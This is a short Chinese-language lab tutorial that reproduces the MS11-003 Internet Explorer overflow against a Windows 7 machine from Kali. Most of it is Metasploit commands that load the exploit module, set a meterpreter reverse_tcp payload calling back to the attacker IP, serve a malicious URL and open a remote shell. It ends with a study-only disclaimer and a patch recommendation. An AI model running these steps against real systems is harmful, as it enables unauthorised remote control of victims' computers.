Ms11_003(Windos7 IE溢出攻击)

MS11_003(Windos7 IE溢出攻击)

---

免责声明：

此文章仅用于学习研究使用，请勿用于违法犯罪，请遵守《网络安全法》等相关法律法规。

---

复现环境：

Windows7(目标机，防火墙关闭)
Kali(攻击者)

复现：

1.查看Windows7 IP：

ifconfig

2.使用kali看是否能ping通Windows7 IP

 ping 192.168.110.131

3.打开Metasploite漏洞库，查找ms11_003漏洞并使用

msfconsole
search ms11_003
use exploit/windows/browser/ms11_003_ie_css_import

4.查看payload

show payloads

5.选择使用的payload

set payload windows/meterpreter/reverse_tcp

6.查看Kali IP

ifconfig

7.查看options

show options 

8.配置options信息（SRVHOST、LHOST均为Kali IP、URIPATH＋任意数）

set srvhost 192.168.110.132
set lhost 192.168.110.132
set uripath 0

9.开始攻击 run/exploite，会生成一个URL，复制链接使用Windows7 IE浏览器访问

run

10.成功获取信息

11.查看session会话

session

12.选择会话连接并成功获取shell

session 1
shell

修复建议：

安装相应补丁